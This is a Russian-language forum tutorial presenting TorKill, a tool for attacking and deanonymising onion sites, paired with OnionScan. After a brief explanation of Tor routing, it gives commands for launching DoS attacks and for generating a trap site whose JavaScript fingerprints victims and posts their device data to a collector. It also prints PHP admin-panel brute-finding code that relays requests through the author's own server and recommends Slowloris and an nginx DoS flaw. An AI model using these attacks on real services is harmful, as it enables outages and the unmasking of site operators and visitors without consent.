OnionScan + TorKill - фреймворк для атаки на onion ресурсы.

[Redman]

Как работает Tor

Тут все очень просто сначала ваши данные попадают на входной (охранный или сторожевой) узел, дальше они попадают на промежуточный узел, а потом на выходной. Кто нибудь задумывался почему логотип Tor'a именно луковица ? Потому что, чтобы добраться до нас нужно сначала снять все слои шифрования. Сама идея возникла в 1995 году при поддержке ВМС США . Потом к разработке присоединился отдел Министерства обороны США. Сеть Tor была создана так, чтобы относиться к узлам с минимальным доверием - это достигается путем шифрования.

Клиент шифрует данные так, чтобы их мог расшифровать только выходной узел. Эти данные затем снова шифруются, чтобы их мог расшифровать только промежуточный узел. А потом эти данные опять шифруются так, чтобы их мог расшифровать только сторожевой узел

• Входной (или охранный, или сторожевой) узел — место, где ваши данные входят в сеть Tor. Причем выбирается не самый ближайший узел, а самый надежный, так что не удивляйтесь, если пинг оказывается на уровне пары сотен миллисекунд — это все для вашей безопасности.
• Промежуточный узел — создан специально для того, чтобы с помощью выходного узла нельзя было отследить входной: самый максимум, что получится отследить, это как раз промежуточный узел. Сам узел обычно представляет виртуальный сервер, так что операторы сервера видят лишь зашифрованный трафик и ничего более.
• Выходной узел — точка, откуда ваши данные отправляются уже на нужный адрес. Опять же — выбирается самый надежный сервер.

Мосты – непубликуемые в общем доступе узлы. Пользователи, оказавшиеся за стеной цензуры, могут использовать их для доступа в сеть Tor. Этот список, BridgeDB, выдаёт пользователям только по нескольку мостов за раз. Это разумно, так как много мостов сразу им и не нужно. Если этот список попадет в открытый доступ, то можно будет заблокировать Tor. В каждом Tor-клиенте вшита информация о десяти мощных узлах, поддерживаемых доверенными людьми. У этих узлов особая роль, они отслеживают состояние сети. Узлы называются - directory authorities. Они отвечают за распространение постоянно обновляемого списка всех известных ретрансляторов Tor, т.е именно они выбирают время и доступность узлов. Я думаю я смог донести до вас кратко принцип работы сеть, для тех кто об этом не знал и для тех кому надо было освежить память.


Принцип работы фреймворка:
Основная цель TorKill - это сломать или взломать onion сайт. Я рекомендую использовать этот инструмент с onionscan, от одного хорошего человека. Есть несколько легких вариантов сдеадонить сайт. Первый - это его положить, тогда в адресной строке мы увидим его настоящий ip. Второй - это найти незащищенный ssh отпечаток и использовать Shodan или Censys. Инструмент может - это все, включая создание сайта ловушки.

Ссылка на github.

Пример того, как с помощью DoS атаки Sh1ttyKids, смог обнаружить реальный адрес сайта по продаже наркотиков.

Чтобы не нагружать нашу систему инструмент отсылает запросы на подконтрольный мне сайт, который я зарегистрировал на этом хостинге. Теперь перейдем к установки дополнительных компонентов.

Если у вас не установлен pip:

• Код:

apt-get install python-pip

Далее устанавливаем нужные компоненты:

• Код:

python -m pip install paramiko
python -m pip install pysocks
python -m pip install colorama
python -m pip install BeautifulSoup

Библиотека Beautiful Soup - это парсер для синтаксического разбора файлов HTML/XML, написанный на языке программирования Python, который может преобразовать даже неправильную разметку в дерево синтаксического разбора. Он поддерживает простые и естественные способы навигации, поиска и модификации дерева синтаксического разбора.

Запускаем

Чтобы запустить DoS атаку достаточно ввести:

• Код:

python torkill.py -u http://target.com -t 100

Если вы хотите воспользоваться другим методом, например созданием сайта ловушки, то введите команду:

• Код:

python torkill.py -u http://target.com -a 10

Сейчас я сделаю небольшое отступление и расскажу о такой программе как Ngrok. Одной командой в терминале програмаа делает ваш локальный сервер доступным всему интернету по специальному HTTPS адресу:

• Код:

ngrok http 80

Советую всем более подробней ознакомиться с данной программой.

Теперь вернемся к TorKill. Если мы перейдем по ссылке сгенерированной нашей программой, то сработает javascript код, который собирает информацию и отправляет post запрос в файл info.php.

• Код:

{"dev":[{"platform":"Win32","browser":"Chrome\/67.0.3396.99","cores":"4","ram":"Not Available","vendor":"Google Inc.","render":"ANGLE (Intel(R) HD Graphics 4000 Direct$ect3D9Ex vs_3_0 ps_3_0)","ip":null,"ht":"768","wd":"1366","os":"Win64"}]}

Большинство скриптов для деанонимизации пишут на Javascript и вставляют в уязвимые сайты или заставляют под каким-нибудь предлогом перейти на специально созданный сайт ловушку. Этот код был у программы seeker, в дальнейшем я планирую улучшать этот код для сбора информации. Чтобы код сработал, достаточно, чтобы жертва открыла сайт на несколько секунд. Вы можете самостоятельно сделать верстку сайта.

При запуске программы она определяет сервер (кстати я очень много натыкался на сайты на которых стоит Apache) и определяет ip выходного узла. Узнав на чем расположен сайт можно его атаковать. Будь это Apache, то ищем под него эксплоиты или атакуем Slowloris, если nginx, то используем Nginx DoS. Также программа анализирует HTTP заголовки, ищет вход в панель администратора, ищет открытые директории, сканирует порты, собирает ссылки со страницы и получает fingerprint.

Еще 1 небольшое отступление, в котором я хочу рассказать о уязвимости в nginx. Это уязвимость позволяет положить сайт, который работает в связке nginx + php. Уязвимость позволяет исчерпать все ресурсы временными файлами, которые создаются при работе с данными форм вида multipart/form-data.

Я знаю, что на многих серьезных onion ресурсах стоит защита от DDoS, но она, или не срабатывала, или не помогала, скрипт я запускал на VPS с 5 гб. Даже когда я атаковал со своего компьютера многие сайты на Apache падали.

Теперь рассмотрим PHP код программы на примере функции Admin FInder:

$host = $_GET['host'];
$requests = $_GET['req'];
$ip = gethostbyname($host);
echo '<ip>'.$ip.'</ip><br/>';
if(isset($_GET['find'])){
    $admin = array("admin","administrator","adm","login","loign.php","administrator.php","admins.php","logins","admincp","admincp.php","admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.php","admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/","administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php","administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html","moderator/admin.php","moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php","adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp","administrator/login.asp","administrator/account.asp","administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp","moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html","administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php","ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php","webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/","admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/","panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/","utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/","login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/","hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/","banneradmin/","sshadmin/","phpldapadmin/","macadmin/","administratoraccounts/", "admin4_account/","admin4_colon/","radmind-1/","SuperAdmin/","AdminTools/","cmsadmin/","SysAdmin2/","globes_admin/","cadmins/","phpSQLiteAdmin/", "navSiteAdmin/","server_admin_small/","logo_sysadmin/","server/","database_administration/","power_user/", "system_administration/", "ss_vms_admin_sm/");
    foreach ($admin as $shell){
        $headers = get_headers($host.$shell);
        if(stristr($headers[0],"200")){
            echo "<admin><a href='$host$shell'>$host$shell</a> Founded!</admin>";
        }
    }
}

Здесь все просто Torkill отправляет 2 GET запроса, 1 значение которого записывается в переменную $host, а второе дает понять какую функцию мы выбрали, в данный момент - это find, т.е запрос будет иметь такой вид:

• Код:

http://target.com?find&host=target.onion

Вот как это выгядит на python:

• Код:

data = requests.get(host + '?find&host=' + target1, headers=headers, proxies=proxies).text

OnionScan
OnionScan - свободный инструмент с открытым исходным кодом для ирасследования Dark Web. На все удивительные технологические инновации в сфере анонимности и конфиденциальности всегда нависает постоянная угроза, имеющая не эффективные технологические патчи - это человеческие ошибки.

Будь то утечки оперативной безопасности или неправильная настройка программного обеспечения - наиболее часто времена нападения на анонимность не приходят от базовой системы, а от себя.


OnionScan имеет две основные цели:

• Мы хотим помочь операторам скрытых сервисов, найти и исправить проблемы оперативной безопасности с их услугами. Мы хотим помочь им обнаружить неверные настройки и вдохновить новое поколение анонимности, инженерных проектов, чтобы помочь сделать мир более уединенным местом.
• Во-вторых, мы хотим помочь исследователям контролировать и отслеживать Dark Web-сайты. В действительности мы хотим сделать это как можно проще. Не потому, что мы согласны с целями и мотивами каждого силового расследования - чаще всего нет. Но сделав эти виды расследования легкими, мы надеемся создать мощный стимул для новой технологии анонимности.

Установка
Для начала установим go:

• Код:

apt-get install golang-go

Затем дополнительно:

• Код:

go get github.com/HouzuoGuo/tiedot

go get golang.org/x/crypto/openpgp

go get golang.org/x/net/proxy

go get golang.org/x/net/html

go get github.com/rwcarlsen/goexif/exif

go get github.com/rwcarlsen/goexif/tiff

И собственно саму программу:

• Код:

go get github.com/s-rah/onionscan

Появятся кое какие папки в домашней директории. Из /root/go/bin копируем onionscan в /bin

Это делается для удобства использования скрипта, чтобы не заморачиваться с вводом путей.

Так же перед выполнением следующего пункта требуется установленная и запущенная служба Tor. Если ее еще нет:

• Код:

apt-get install tor

Если она не запущена:

• Код:

service tor start

Использование:

Для простого отчета подробной области высокого, среднего и низкого рисков, найденных в скрытом сервисе:

• Код:

onionscan сайт.onion

Наиболее интересные выводы приходят с параметром verbose:

• Код:

onionscan --verbose сайт.onion

Существует также JSON - вывод, если вы хотите интегрировать с другой программой или приложением:

• Код:

onionscan --jsonReport сайт.onion

Если вы хотите использовать прокси-сервер, прослушивающий нечто иное, а не 127.0.0.1:9050, то можно использовать флаг --torProxyAddress:

• Код:

onionscan --torProxyAddress=127.0.0.1:9150 сайт.onion

Можно также напрямую настроить типы сканирования с помощью параметра сканирования:

• Код:

onionscan --scans web сайт.onion

Не забываем после работы программы остановить службу Tor:

• Код:

service tor stop

Более подробная документация по использованию можно найти тут.